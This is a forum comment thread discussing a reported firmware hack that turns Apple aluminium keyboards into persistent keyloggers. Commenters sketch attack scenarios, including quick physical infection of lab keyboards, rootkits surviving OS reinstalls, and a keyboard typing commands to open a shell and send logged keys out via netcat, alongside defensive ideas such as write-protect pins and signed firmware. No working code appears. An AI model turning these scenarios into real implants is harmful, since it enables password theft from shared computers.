Re:Coming soon to an enterprise near you

[Kozz]

No problem. My company supplies me with all the post-it notes I need!

Re:Coming soon to an enterprise near you

[johncadengo]

You know. I think I could actually implement that.

Just let me cook you up a firmware update for you real quick... And all you have to do is download and install it...

Physical access required

[pushing-robot]

Unless you also have some hidden program on the computer to flash the keyboard and later download the data (in which case you could just log the keys by software), you'd need to physically remove the keyboard, flash it with a keylogging BIOS, return the keyboard, then later retrieve the keyboard to get the logged keys.

And, as they say, physical access is root access. There are an unlimited number of ways someone could compromise your computer if they are given access to the hardware and firmware. This hack is just further proof of that.

Oh, and don't let anyone lend you their keyboard.

Re:Physical access required

[Iphtashu+Fitz]

And, as they say, physical access is root access. There are an unlimited number of ways someone could compromise your computer if they are given access to the hardware and firmware

Only as long as they have a fair amount of time. The beauty of this hack is that you could set up a laptop so that any keyboards that get plugged into it are immediately infected. Then you only need a few seconds alone with the targets computer to unplug the keyboard, plug it into your laptop to infect it, then plug it back into the targets computer and leave. It minimizes the risk of being caught trying to do something more extensive to the system. You just walk into an unoccupied office and walk back out 30 seconds later knowing that the keylogger is installed, as opposed to spending 30 minutes in the office trying to reboot, get into the firmware, etc.

Re:Physical access required

Why are people always so quick to dismiss the seriousness of low level exploits?

Consider a Mac pool at a university. You unplug the keyboard, plug it into a small box with a USB host controller that you programmed to rewrite the keyboard firmware. Plug the keyboard back in, wait until someone else logs in. Then come back, open a text editor, type your secret trigger word, watch as the keyboard spits out the logged passwords.

Consider a remote root exploit. That enables the hacker to reflash the firmware of an attached keyboard. Then the attacker can remove all traces of the hack from the target computer. The keyboard logs passwords and waits for a trigger word. How do you make someone type a strange word? Captcha. The attacker now has your password/passphrase (SSH login to your company's web server? Your online banking PIN? And the only trace is a modified firmware which nobody checks.

Re:Physical access required

[pushing-robot]

I'm not dismissing the seriousness of the exploit, just pointing out that there are tons of ways to exploit a computer you have physical access to. You could swap keyboards when someone isn't looking. You could hook up one of the tinier keyloggers. Or you could attack the computer itself in any number of ways.

The moral is: If you want to protect against knowledgeable, determined attackers, don't let them touch your PC.

Re:Physical access required

[FlyingBishop]

I also don't see to many good ways to stop this.

With BIOS passwords and an alarmed lock on the case, even though someone has physical access, they're missing most of the benefits. This, you need some sort of lock that prevents the user from unplugging the USB cable, and then you need to somehow ensure that they can't load any software to take the keyboard.

Seems like a really stupid problem when I'm using a 10-year-old OEM keyboard that probably cost all of $10 that has no such issues.

Re:Physical access required

[GrantRobertson]

Then you only need a few seconds alone with the targets computer to unplug the keyboard, plug it into your laptop to infect it, then plug it back into the targets computer and leave.

In addition, it should be relatively easy to program a PLA (programmable logic array) with a USB interface to create a small device to upload the key-logger to the keyboard. That device could be fit into a hollowed out cell phone so that no one would be the wiser. Later, that same device could be used to download the keystrokes. Who is going to notice someone sitting at a computer with a cell phone laying on the desk? The device could even be designed to download and store the logs from dozens or hundreds of keyboards. If the user had frequent enough access to the keyboards, such as in a university computer lab or library, then they could just make the rounds every once in a while and round up all kinds of passwords. Especially since the URL and password is often the only thing many people actually type on a computer used primarily for web access.

What this means is that universities need to secure the USB connections for the keyboards so that they can not be easily unplugged. Then they need a regular procedure to go around and reset the firmware on the keyboards. Perhaps someone could write a little app that could be run on boot-up that checks the firmware for malicious code and resets it to the default every time the machine is rebooted. Perhaps this should be included in the next update from Apple.

Re:Physical access required

[russotto]

In addition, it should be relatively easy to program a PLA (programmable logic array) with a USB interface to create a small device to upload the key-logger to the keyboard. That device could be fit into a hollowed out cell phone so that no one would be the wiser.

No need for a "hollowed out cell phone". You could just use a real cell phone with a USB interface. Such as a jailbroken iPhone.

Re:Physical access required

[GrantRobertson]

Of course! What was I thinking?

Re:Physical access required

Who was the moron who moderated the parent as funny?

Re:Physical access required

[textstring]

And, as they say, physical access is root access.

Though they rarely say that physical access is root access that persists through reformats as long as you 're using the same keyboard

Re:Physical access required

And only buy keyboards that are certified never to have been touched by human hands? I could probably infect half the Apple keyboards in the local Fry's without drawing suspicion.

Re:Physical access required

Now there's an attack... Take over a machine and make it destroy every keyboard that is attached as the admins try to get back in.

Re:Physical access required

[AHuxley]

Lets see, young?
Dumb?
Work for NSA, CIA, DIA, mil intel and troll forums to muddy the water?
Never had a sneak and peek warrant served against them?
PC users who dont seem to understand most Apple computers ship with a KB from Apple and this would be a dreamy way in?
Dont read the history of the clandestine services and the fun they had with hardware tech over the decades.
The Church report did not make "them" all be good...
Also from the Windows side, random and total penetration is a given?

Re:Physical access required

[complete+loony]

Even quicker and simpler if you can swap the keyboard with a spare of the same model. I'd probably program it to capture the first N keys pressed after powering on. That way you should get the users login username / password.

Re:Physical access required

[Torne]

The point is that you can exploit the machine remotely using some software bug, and then install such an update on the user's keyboard. The exploit running on the OS will reassure the exploit running on the keyboard that everything is OK periodically. If the user discovers their computer has been compromised and reinstalls the OS from clean media, the keyboard will no longer be told that the machine is still owned, and can reinstall the exploit by, say, typing in a suitable command once the keyboard is idle for some time and thus the user hopefully isn't looking at the screen.

Voila, a rootkit that persists even through clean OS reinstalls from trusted media!

Flash needs write protect switches

Microcontrollers in keyboards, BIOS flash, USB-sticks, SD-cards: Please give us hardware write protection. Whether we want our keyboards to be just keyboards, our BIOS unmodified by root kits, USB sticks which we can insert into someone else's system without worrying that our stick gets infected or boot of an SD-card, a simple write protect switch is the easiest and most reliable way.

Re:Flash needs write protect switches

I'd like to see this myself, where to start a BIOS flash process some type of button needs to be held down or a DIP switch flipped.

I sort of miss the days of SCSI drives. With just one flick of a DIP switch, the entire drive was made read-only. Nothing would be able to write to it, no matter how trashed the host machine ended up, no way, no how.

I'd use this functionality on removable drives, copying files then moving them to a FTP server and serving them from the read-only drive to ensure that the files would remain unmodified, even if the FTP server got compromised. However, those were the days before people thought of adding code to the ftp daemon to tamper with the executable as it was in flight before it got to the client.

Re:Flash needs write protect switches

[Grishnakh]

It's too expensive. A single DIP switch might cost $0.10 in large quantities. Multiplied by a million units, that's $100k, which is a nice bonus for the CEO.

Re:Flash needs write protect switches

[iluvcapra]

You wouldn't have to do a DIP switch, and that would be a bad solution anyways. You could have a pin on the chip that forbids writes unless it's tied to ground, thus one step in the manufacturing would be snipping the pin. Even harder-core would be a pin that blows a circuit protector when it's tied to ground, and permanently forbids writing after the connection.

But as other have pointed out, this would ruin the ability for the vendor to ship field upgrades to keyboards.

Re:Flash needs write protect switches

[Grishnakh]

I don't know about other manufacturers, but I'm pretty sure the Microchip PIC microcontrollers I use, several of which have USB built-in and would be perfect for a keyboard, can only be re-flashed by an external programmer which provides a +12V programming voltage (which you don't normally supply in such a circuit, only +5V from the USB bus), and are not programmable at all over the USB bus, only certain pins on the MCU.

Re:Flash needs write protect switches

[arminw]

....You wouldn't have to do a DIP switch,....

A simple way to do this would be to have an extra contact on one or two keys. In order to change anything on the chip, a user would be required to hold down that key or keys. Any time a user has to participate by holding down a key, this sort of thing is thwarted. Alternatively, Apple could modify the software update program so that any time a keyboard reprogramming must be done, certain key codes must be entered or certain combinations of keys pressed.

Re:Flash needs write protect switches

[metaforest]

I don't know about other manufacturers, but I'm pretty sure the Microchip PIC microcontrollers I use, several of which have USB built-in and would be perfect for a keyboard, can only be re-flashed by an external programmer which provides a +12V programming voltage (which you don't normally supply in such a circuit, only +5V from the USB bus), and are not programmable at all over the USB bus, only certain pins on the MCU.

This is untrue. Only in the oldest PIC16 MCUs was it impossible for code running on the chip reflash the program space.

Almost all of the PIC18 and later MCUs support direct programming of flash by the code running on the device without ANY change in voltages or signals applied to the device.

NOW it is possible for the OEM to DISABLE the ability for code on the device to reflash, by changing the FLASH configuration bits. IT might even be possible for a savvy end user to harden their keyboard in this way.

Doesn't USB have DMA capability?

[JanusFury]

If I'm not mistaken, doesn't USB have a way for devices to access the host's memory via DMA? If so, does that mean it's possible for a 'hacked' keyboard to use DMA to write an exploit into the host machine's memory?

Re:Doesn't USB have DMA capability?

[TheRaven64]

No, USB DMAs can only be initiated from the host (it's a client-server protocol, remember). A USB device has to trick the driver into starting a DMA, which is probably difficult for a keyboard to do without pretending to be some other kind of device. FireWire, on the other hand, allows one device to initiate a DMA request on another and it is up to the driver to block this.

Re:Doesn't USB have DMA capability?

[iluvcapra]

No, USB DMAs can only be initiated from the host (it's a client-server protocol, remember).

Note well, though, while we're talking about Macs, that FireWire/IEEE 1394 is non-hosted and does have DMA, so in theory someone could hand you a hacked Sony camcorder or hard drive with malicious firmware, that would then have DMA to your computer. But that's a "hardhack."

Re:Doesn't USB have DMA capability?

[AHuxley]

Smiles. The the old days, just fill the camcorder with a substance that ends the problem. Then you make a martyr and have a generation wanting to be as good or better.
But if you could hand off a camcorder with media files and a hardhack, you have a way in and at anytime can 'out' the target.
Keep the info flowing or expose them later.
Let their own internal security stumble over and clean up for you :)
Digital cointelpro :)

Re:Too much work

RTFA.

Update is completely through software. You'd know this if you even glanced at the article.

Makes me glad...

[Iphtashu+Fitz]

...that I don't like the Mac keyboards. I use a Mac Pro at work but the first thing I did was go out and buy a Microsoft ergonomic keyboard. Yeah, I know it's probably blasphemy to many to mix MS & Apple hardware, but I've used MS ergonomic keyboards since they practically first came out, both at home and at work, and would never go back to a regular keyboard, especially one from Apple. I've yet to see one from Apple that doesn't make my hands ache after a few hours of use.

Re:Makes me glad...

[Super_Z]

Why do you assume only Apple keyboards are hackable?

Re:Makes me glad...

[alen]

probably a lot of keyboards, but Apple keyboards are probably the largest block of a single identifiable brand out there. everyone probably uses OEM'd logitechs but those are probably customized to each OEM

Re:Makes me glad...

It's blasphemy indeed. I won't contaminate my MS hardware with "shiny" Abble shit.

Re:Makes me glad...

[mysidia]

So, er, what if there is a similar firmware hack discovered for Logitech KBs? The problem with everyone using OEM'd logitechs, or everyone using any particular KB type, hackability is more likely to be exploited than otherwise.

Customized to each OEM doesn't necessarily mean incompatible firmware, or a different process for upgrading/applying firmware.

Re:Makes me glad...

Same here although I stopped using the MS keyboards a number of years ago. I can't figure out why keyboard manufacturers insist on making keyboards so damn wide. Most people do not need the keypad and if you get rid of it then you don't need to reach extra far to get to the mouse (assuming right handed here).

I'm currently using a Kinesis Maxim but I don't like it all that much (it's too clunky/chunky and the keys are too hard to press). I keep it because it's the only "nice" split keyboard without a keypad. I like the MS keyboards a lot better though... if only they didn't have that damn keypad.

Re:Makes me glad...

Hmmm... Mixing MS and Apple hardware sounds like the time I mixed Coke and Pepsi....
The doc says my grafts are taking quite nicely, thank you.

Re:Makes me glad...

Because Apple and a couple of Logitech keyboards are the only ones to use flash.

Re:Makes me glad...

[AHuxley]

Someone deep in the NSA or CIA printing this and smiling, fun while it lasted :)

Re:Makes me glad...

Because he's an idiot.

The Upside?

Anyone have any ideas for firmware modifications to add additional functionality?

Re:The Upside?

A key sequence that can be hit so it would hit the space bar every couple seconds.

This is so I can AFK in WoW BGs without getting booted, but still get honor and marks.

Re:The Upside?

[mysidia]

The 'fn' button is a PITA. I would like to turn it into an 'insert' button, and use the caps lock key as a fn button instead, since I never use caps lock anyways.

One often needs Shift+Insert when RDP'ing or connect to a remote windows machine with remote console, and an Apple keyboard has no means of sending that keystroke.

Re:The Upside?

[PhireN]

Yeah, I like the feel of the apple keyboards, but I use Linux, and I don't like the scan code mappings.
It shouldn't be too hard to create an alternate layout which reports the expected key codes for the F1-F12 keys, remaps Fn to Insert, F13 and F14 to Print Screen/Sys Req (So I can use the magic Sys Req key when my computer crashes) and Pause/Break.
The remaining F15-F19 keys can be remapped for extra features.
Then the keyboard would be fully compatible with Linix and Windows machines without the need for special drivers.

Re:The Upside?

Disable annoying CapsLock delay and remap some keys to increase compatibility with Linux/Windows.

Re:The Upside?

[metaforest]

Yeah.

How about a firmware mod that disabled the firmware update process, or makes it's use contingent on an unused GPIO pin on the MCU, eg a custom 'write protect' switch.

What about other keyboard manufacturers?

[ThrowAwaySociety]

Is the Apple implementation any different from what other USB HID makers use? I'd be kind of surprised if Apple did anything original with its keyboard design other than making them shiny and thin (and giving them no tactile feedback whatsoever.)

And if so, are other USB keyboards vulnerable to similar hacks?

Re:What about other keyboard manufacturers?

[Doctor_Jest]

I was thinking the same thing (typing on my Logitech Wave)... I would think that before this presentation, most people figured the attack vector YOUR KEYBOARD would be low if not miniscule. This is most likely a disturbing trend we're going to see more of before it's all said and done (and you know what they say, after all is said and done, a lot more is said than done.) I remember they used to attempt keyboard hacks by listening via the internal microphone, as well as using other nefarious spy-like techniques to gather your passwords. No more. No need to flutter in like Tom Cruise and attach a keylogger to the back of a connector.. now you just cause a firmware update. *facepalm* This is going to make all these thrillers seem so pedestrian. :)

I have littlesnitch on my Macs, so in the unlikely event my keyboard is compromised (God forbid), at least I'll have a clue it's trying to squawk out of turn. :) Yes, I realize it's not perfect... but at least I'm performing my due diligence in the face of an unpatched vulnerability. :) *sigh* This is getting silly, to be honest. The KEYBOARD? Really? adjusts tinfoil hat....

Re:What about other keyboard manufacturers?

All USB keyboards are vulnerable. The blame here rests on the USB Device Firmware Update Specification, which specifies how firmware updates are supposed to work. Hint: there's no security. The only reason this makes news at all is because it has the word "Apple" in the title.

Spec compliant, secure: choose one. USB was designed for single user computers without security in mind. The only way to solve this (partially) with existing hardware would be to block access to hardware devices from applications running as non-root users, which is fundamentally contrary to the desire to get device drivers out of the kernel for stability. Short of that, this can only be solved by putting a more powerful CPU in the keyboard controller so that it can do a signature check on its own firmware.

Re:What about other keyboard manufacturers?

[Scrameustache]

I'd be kind of surprised if Apple did anything original with its keyboard design other than making them shiny and thin (and giving them no tactile feedback whatsoever.)

Mine is a USB hub, you can plug in your mouse (right or left hand side, as you wish) and a USB key, or pretty much anything else.

I like having two mice coming out of it, personally (my preference varies).

I've never seen that on a windows machine.

Re:What about other keyboard manufacturers?

Have you looked?
I have a USB hub in my "Microsoft Natural Keyboard Pro" which I bought in 2001. It was released in 1999.
I'm sure other makers have had it for atleast as long.

Re:What about other keyboard manufacturers?

[mjcb]

Didn't the old Apple USB keyboards (from the original iMac) that had the power button on it somehow violate the USB standards at the time? Isn't that why they no longer have that button? Or maybe they do, I haven't used a Mac in a while.

Re:What about other keyboard manufacturers?

[Grishnakh]

Wouldn't this depend on the keyboard being reflashable from the USB interface? There's a lot of USB microcontrollers out there which can only be re-flashed with physical access to the hardware, not through the USB interface. Maybe this violates USB HID spec, but why does anyone need their keyboard firmware to be upgradeable anyway? This isn't exactly something that changes often. Your typical $5 USB-to-serial adaptor isn't upgradeable either to my knowledge, why should this be?

Re:What about other keyboard manufacturers?

I was thinking the same thing (typing on my Logitech Wave)... I would think that before this presentation, most people figured the attack vector YOUR KEYBOARD would be low if not miniscule.

It is low. It's just that there are now nearly seven billion people on the planet.

Re:What about other keyboard manufacturers?

[xenocide2]

have littlesnitch on my Macs, so in the unlikely event my keyboard is compromised (God forbid), at least I'll have a clue it's trying to squawk out of turn. :)

I think you missed the slide where they discussed how to disable it via keyboard commands.

Re:What about other keyboard manufacturers?

[lurker-11]

The only way to solve this (partially) with existing hardware would be to block access to hardware devices from applications running as non-root users, which is fundamentally contrary to the desire to get device drivers out of the kernel for stability.

Note that the root user account and the special priviledges usually given to it have nothing to do with kernel mode. Code running as root may be able to get code to run in kernel mode, such as by loading a kernel module (and in theory this priviledge could be given to other accounts as well), but is still running in regular user mode.

Re:What about other keyboard manufacturers?

[richard.york]

(and giving them no tactile feedback whatsoever.)

That's funny, because my Apple keyboard seems to have this feature where you apply pressure to the little plastic buttons and this causes a tiny spring loaded plastic mechanism to compress and pop back into place in response to that pressure. It's almost as though I can tell when a button is being pressed and released by virtue of that physical up and down movement of the buttons alone. It seems like there's a word for that...

Re:What about other keyboard manufacturers?

[AHuxley]

This is getting silly, to be honest. The KEYBOARD? Really? adjusts tinfoil hat....
The US gov got into Crypto AG so they could read embassy ect. traffic in real time.
That was a hardware fix so that all shipped units would be open to US eyes.
One hope this is Apple been Apple, split over itoys, music and an OS, with desktop hardware easy to fix or add to,
but always keep an open mind and read up on what was done by very very smart Americans in the past.
The hole for a keyboard sniffer would be worth the effort, all you need is physical access, hoping at one point the KB is used cold to enter a pw.
Like a simple black box on flight, you might not get the full cockpit chat, but over weeks, you have something.
The end user can encrypt, look, use cd's OS, wipe and hunt for OS loggers all day and night.
But the USA might just be back in the hardware game again ;)

Re:What about other keyboard manufacturers?

[Doctor_Jest]

No, I didn't... but that's another matter altogether.

Re:What about other keyboard manufacturers?

Or one of those old fashion switches.

In the A position the keyboard can be flashed, in the B position it cant.

Of course this would probably be relatively expensive if you make a few million of the keyboards but it -is- a solution.

Re:What about other keyboard manufacturers?

[dkf]

The only way to solve this (partially) with existing hardware would be to block access to hardware devices from applications running as non-root users, which is fundamentally contrary to the desire to get device drivers out of the kernel for stability.

Eh? You sound rather confused about the difference between the root user (still a normal user, though with unusually elevated privileges) and the OS kernel (can do anything at all). There's quite a lot of processes running on the average Unix system that have root privileges but which aren't in the kernel. Having (the majority of) each USB device driver be non-kernel is quite possible, and restricting the "upload new firmware" functionality to root is a very good idea, as is checking for a strong crypto signature of someone I trust on it first. (Who to trust is a separate issue, but with firmware you really want it to be Known Good or you run the risk of real trouble, of which malware is only one of the possible problems. Plain old corrupted files bricking the keyboard is another issue that you don't ever want to encounter...)

Normal users (and even root if it isn't doing the special look-behind-the-curtain) should just see keyboards as keyboards. There's no reason at all for normal users to be able to reflash their keyboard firmware.

Re:What about other keyboard manufacturers?

It is not a problem with the USB Device Firmware Update Specification. The transmitted firmware must contain all necessary information which is needed to make the device accept and write the firmware. That may very well include a password or a cryptographic signature which the device checks to see if the firmware is acceptable. A generic authentication scheme in the update specification would most likely be inadequate or problematic for many device types.

Note that, short of a hardware switch, protecting against unwanted firmware upgrades is a non-trivial problem. If the user is expected to perform firmware upgrades, then the device must somehow accept new firmwares. You can opt for cryptographically signed firmware files, but that precludes owner-controlled modifications. You can't rely on the OS privilege control (otherwise we wouldn't be discussing this here). The only option which doesn't take control away from the device owner and doesn't rely on OS privilege separation is a synchronized user interaction with the device, such as holding a key combination on a USB keyboard. However, many devices don't have a way for a user to signal "enable firmware upgrade" to the device -- except through the computer, which doesn't solve the problem.

Re:What about other keyboard manufacturers?

[AmiMoJo]

Actually, most USB keyboards do not feature updateable firmware. Even if they microcontroller has flash (and most of the cheap ones only use it for things like vendor and product ID, not the actual protocol software) there is nothing in the USB spec that says you have to support firmware updates.

Of course, you could try programming the chip directly as they do at the factory, but even if it's possible it would probably just be easier to replace it with one of your own.

Re:What about other keyboard manufacturers?

[AmiMoJo]

Oh, and one other thing, Atmel AVR microcontrollers support encrypted firmware updates using 128 bit AES. It's pretty secure, and can work over USB.

Re:What about other keyboard manufacturers?

[ivan256]

Your typical $5 USB-to-serial adaptor isn't upgradeable either to my knowledge, why should this be?

Some of them are. The ones that aren't are that way simply because they took the non-volatile memory out to save a buck, and instead the firmware is uploaded to the device every single time you plug it in. Of course, that means you need to have the manufacturer's driver installed on the computer you wish to use the device on....

Re:What about other keyboard manufacturers?

[willy_me]

From my limited experience in programming USB AVR microcontrollers - there are two ways to load a new firmware via USB. One, you tie a specific pin to ground and then upload the firmware. Two, the existing firmware has to enable the uploading of a new firmware - basically a boot loader. There are specific registers in an AVR micro to enable Boot Loader (Read-While-Write Self-Programming) support.

So to program the USB-to-serial adaptor, it would have to be disassembled and modified according to what kind of chip is was. There is no way that Boot Loader support was enabled in such a device as it is significantly more complicated then simply leaving it disabled. But the Apple keyboards might need upgrades - likely for international support. These upgrades require Boot Loader support that any application can take advantage of.

Re:What about other keyboard manufacturers?

[willy_me]

Sorry to reply to myself, but it just occurred to me that those USB-to-serial adapters typically use dedicated hardware. Prolific makes a pile of these chips...

Re:What about other keyboard manufacturers?

[ThrowAwaySociety]

(and giving them no tactile feedback whatsoever.)

That's funny, because my Apple keyboard seems to have this feature where you apply pressure to the little plastic buttons and this causes a tiny spring loaded plastic mechanism to compress and pop back into place in response to that pressure. It's almost as though I can tell when a button is being pressed and released by virtue of that physical up and down movement of the buttons alone. It seems like there's a word for that...

(O/T)

Spring mechanism? Well if you have a 15-year-old old Apple keyboard with a spring mechanism, then yeah, you'd get some feedback out of that.

I was referring to the keyboard discussed in TFA, though. The aluminum ones with chicklet keys that have about 1mm of travel, and tiny rubber dome switches instead of springs. If you can feel those little rubber domes popping, then you have very sensitive fingers, my friend.

Re:What about other keyboard manufacturers?

[croddy]

the aluminum apple keyboard is absolutely horrific to type on. it is the single worst keyboard i have ever used, and nothing else even comes close. it is too low to the desk, it has crappy rubber mush switches, and the keycaps are rounded at the edges so your fingers get lost. my fingers start to hurt after about 20 minutes of typing on one of these nasty little keyboards. they're just awful.

now, the apple extended keyboard ii, that's a good keyboard.

Re:What about other keyboard manufacturers?

[mikiN]

s/USA/China/g

I reckon that China's shipped about 3 and a quarter bazillion keyboards worldwide by now.
Care to check them all for Flash firmware 'stowaways'?

How is news worthy...

[mario_grgic]

I'm sure every microwave out there is "hackable" in the sense you can replace its firmware and make it burn users popcorn each time. So what?

Unless you discovered a way to hack someone's keyboard remotely without user intervention, this is not even worth mentioning on a geek site.

Re:How is news worthy...

[FlyingBishop]

Are you a computer professional? Because this is huge. My university decided to stop buying PC hardware, and just re-use their existing Windows XP licenses for boot camp on all new machines. Incidentally, every new machine on campus has one of these keyboards. A reasonably curious student could easily pwn a few keyboards in one of the labs, and then have a handy supply of logins to screw around with as he pleases. This is bad bad bad for anyone deploying Mac keyboards in an enterprise environment.

Re:How is news worthy...

[mario_grgic]

Yes, I'm a computer professional :D. Why go into all the trouble flashing ROM and keyboards, when a simple small, unobtrusive USB keyboard logger is so much easier, more convenient and it has larger memory and some of them are no thicker than the keyboard cable. Also, if you have access to the machine, there are other better ways to do what you want.

Re:How is news worthy...

[Beelzebud]

How many people do you know that uses their microwave to do online banking? THINK

Re:How is news worthy...

[AHuxley]

A USB keyboard logger might be seen by staff or students?
Once discovered, the Feds ect roll.
A kb just gets stuck and is replaced or used year after year.
Dude my KB is messed up
Dude we have to get this done, its 2 am
Like pull and push the usb cable a bit dude
Follow the cable up and press it back in dude
I am, what the, its like snapped dude, I broke the Apple
ha ha Apple makes ...
Dude thats like different plastic, like bigger,
DUDE, wtf is a huge chip doing in this!

Re:How is news worthy...

Yes, there are better ways, except the thing about this hack is it's close to undetectable. A USB keyboard logger can be noticed. I'm not sure if there's any way to detect a reflashed keyboard.

Re:How is news worthy...

[mikiN]

Soon, that question will be rephrased:

How many people do you know that have a microwave oven that's NOT connected to the 'net in some way? So that they can go to the little nuker's website from work to program it so they can have a hot steamy pizza right when they get home from working late?

Oops, hacker got there first, now my house's on fire...

Old tech is the best tech.

[oDDmON+oUT]

This is a hack on all the new shiny aluminum white keyed keyboards.

I predict a run no eBay sales of old keyboards and USB PC alternatives for the paranoid.

For the rest, well...you get what you pay for eh?

Re:Old tech is the best tech.

[slyborg]

Love the dumb comments on this thread. The army of ninja hackers will not be sneaking into houses tonight to backdoor all of the Apple keyboards in the world. The fact that it requires physical access to the keyboard makes it pretty close to useless except for public access sites and people who are cheating on their S.O. who happens to be a Black Hat hacker. I would suggest in the latter case you are hella screwed anyway.

Re:Old tech is the best tech.

[gobbo]

Those crappy white keyboards? Terrible design. They're white, so look grungy in a few days. It's a clear plastic bowl that collects crap, hair, fuzz, what have you... and then shows it to you, inaccessible to any cleaning strategy. The keys don't depress at the correct angle, and so feel sticky unless you hold your hand at an unergonomic angle. They don't sound right. The cord is too short. The USB hub doesn't provide enough power to most USB sticks.

The only thing those keyboards have right in the design department is the thin frame, so you can snug your mouse pad up to it and they fit on a keyboard tray together.

FIFO? LIFO?

[mano.m]

The first link says FIFO; the fourth implies LIFO. Which one is it?

Re:Too much work

[dgatwood]

That's a red herring. Unless they have changed recently, the internal keyboards on Mac laptops are dumb devices---just a bunch of wires and switches. The controller is on the logic board.

So all it needs...

[s0litaire]

... is for a enterprising hacker to do:

1) A bit of code hacking to put the Keylogger + a simple method to send keystrokes to a 3rd party into a firmware update for the keyboard.

2) Start a "Man in the middle" attack between a Mac user and Mac update servers.

3) User installs update..

4) ???

5) Profit off of all those banking details....

Um... I must be missing something

[Hortensia+Patel]

If someone has sufficient permissions on your machine to update your firmware, aren't you kind of screwed already? I suppose they could swap your (external) keyboard for a compromised one, but that still implies physical access.

That said, given that the ability to update is useful, and that the flash memory size we're talking about is so small, is there a significant downside to having the OS check hashes of the firmware code on initialization?

Re:Um... I must be missing something

[vertigoCiel]

That's now how you would pull off this attack. It would go something like this

"Hey, I think my keyboard's acting up. Could I borrow yours for a sec?"

"Sure."

Re:Um... I must be missing something

[Hortensia+Patel]

Meh. I'm not sure which one is the attacker in your scenario, but IMHO that's still requiring physical access. You need to:

1) Be right next to the target, and probably known to them, since people don't generally borrow hardware from total strangers
2) Have a plausible reason for having a spare keyboard handy
3) Be able to sabotage the victim's keyboard so that it "acts up" when you need it to

All in all, I don't find this remotely scary. This is not going to be the dreaded Mac Virus Of The Apocalypse (you know, the one that could take down an entire advertising agency or small art college).

Why was this implemented? Stupid or evil?

[Animats]

As the article points out, "For a device as simple as a keyboard, it is hard to imagine why a firmware update mechanism is even required." There's no justification for including an update feature other than as a designed-in security hole. The keyboard CPU should be running off a ROM, or at least an MPU where the security bit has been set to prevent future changes.

This looks like a "feature" put in for development that should have been pulled before release.

Re:Why was this implemented? Stupid or evil?

Jeez, between this and the political stuff on digg the idiots are really out in force today.

Re:Why was this implemented? Stupid or evil?

[xianthax]

generally this is included in development as an easier way to load and test a firmware than using a physical programmer partially due to needing physical access to a connector on a PCB to program. It is also some times done to speed your time to market.

All you need to complete is the bootloader, that is, the software that allows firmware update via USB, and your manufacturing team can do into full speed work, when the final firmware is ready you just program the devices you've already completed, package and your good to go. Alternatively you would have to have the firmware on complete lock before a manufacturing run could even begin.

As to the "ROM" debate. Flash is used because its cheaper, faster to develop with, and faster/cheaper to manufacture with. Most types of "ROM" require special,expensive hardware to program, flash is often easier/cheaper/faster and requires a very simple device to program. Flash is also often internally re-writable by the microcontroller which can some times, depending on # of re-write cycles, eliminate the need for separate EEPROM.

Re:Why was this implemented? Stupid or evil?

[Val314]

See http://www.apple.com/downloads/macosx/apple/firmware_hardware/aluminumkeyboardfirmwareupdate10.html
(from http://it.slashdot.org/comments.pl?sid=1322813&cid=28910311 )

Re:Too much work

[93+Escort+Wagon]

RTFA.

Update is completely through software. You'd know this if you even glanced at the article.

New here, I take it?

People seem to be missing the bigger issue

[93+Escort+Wagon]

The problem here isn't really with the end user's keyboard - flashing that is a lot of work for little return, in most cases.

The bigger issue is if/when an enterprising criminal gets access at the plant that makes the keyboards. We've seen CDs/DVDs with malware installed (I'm not even thinking about Sony here); we've seen CompactFlash cards preloaded with viruses... if a batch of keyboards shipped out from manufacturing already installed with a key logger, we're really screwed - who's going to notice?

Re:People seem to be missing the bigger issue

[yupa]

And how will you recover the data ? The keyboard can't call home on its own.

Re:People seem to be missing the bigger issue

Keyboard waits for idle time to hit trigger, sends keystrokes to open shell, opens connection out (netcat?) and dumps buffer. Types "exit".

Re:People seem to be missing the bigger issue

[fluffy99]

How do you know China isn't already doing this? I certainly don't doubt that NSA does this type of stuff.

Re:People seem to be missing the bigger issue

[The_mad_linguist]

Wasn't there an apple keyboard about ten or fifteen years ago that automatically typed something if there wasn't any input for five minutes?

YOU BEST BE TROLLIN'

'physical access unless you have taken over the mac's os'

lol. That's not 'physical access'. That's "You can use physical access, or use remote access".

In the later case you can install a key logger in the OS, so why bother with the keyboard.

..er, because the user can reformat his machine from read-only media, and think he's safe? That's the whole idea.

Re:YOU BEST BE TROLLIN'

[anss123]

..er, because the user can reformat his machine from read-only media, and think he's safe? That's the whole idea.

..er, because the user can reformat his machine from read-only media, and think he's safe? That's the whole idea.

If the user reformats his mac how will you retrieve the keylog? Either you need physical access or you have to break into the OS again. If you can break into the OS it's unlikely that the 1000 character keylog waiting for you is worth the effort.

If you got physical access you can install a physical key logger. A firmware key logger may be easier to hide and install but that's it. You still have to retrieve the data, so excepting the greater ease it's not superior to a simple key logger hidden inside your keyboard. Also, a key logger on the port of your PC is likely easier to install and remove (when the evil guy wants it back to see what's on it) opposed to hocking your keyboard to a laptop or whatever.

Re:YOU BEST BE TROLLIN'

[Architect_sasyr]

I'm thinking out loud here... but the Mac keyboards have bluetooth, so some sort of secret-key-dumping program might be an alright idea (no idea if it would be feasible). It still requires localised access I know, but you don't have to enter the building, just drive past, fire your secret key out your bluetooth interface and then save the dump you receive back. Once the firmware is there of course.

Anyway this is just me trying to think outside the box, it might be complete shit.

Re:YOU BEST BE TROLLIN'

[ivan256]

Most mac keyboards don't have bluetooth.

This is sensationalist article. Did you read it? It basically says that you can flash bad firmware onto a device. He picked an Apple keyboard for attention. He could have picked a Logitech keyboard, or any number of other PC accessories, or your PC's BIOS. Most of which (including this keyboard) have no security whatsoever stopping you from flashing something other than the manufacturer's image onto the device.

Re:YOU BEST BE TROLLIN'

[croddy]

most keyboards don't have microprocessors and memory. he didn't pick an apple keyboard for attention out of a field of identically vulnerable keyboards. he picked it because it was a special example with odd specifications that enable this attack.

there are a few logictech keyboards he could have picked (the programmable ones with the LCD and all that), but no, this is not some widespread problem. this is an apple keyboard issue.

Re:Too much work

[Weedhopper]

Not entirely dumb. I have a US keyboard/top case for a late 2006 MB that began registering as a UK keyboard after a Coke spill.

No, It would take me about two seconds

[Hal+The+Computer]

Apple keyboards are pretty standard. You just buy your own and install a keylogger at your leisure. Then you just have to swap your doctored keyboard for theirs. If you have any skill at slight of hand, you could probably do this while someone is watching you.

Re:No, It would take me about two seconds

If you have any skill at slight of hand, you could probably do this while someone is watching you.

Alright, I'll bite: major props to the first youtube video of someone palming a keyboard, pulling it out of someone's ear, and/or rolling the keyboard across the back of their knuckles.

As for the swap, be sure you've used your keyboard as much as your target, I know I'd notice if I went to type and the keyboard was suddenly clean of all the hair and food and God knows what else...

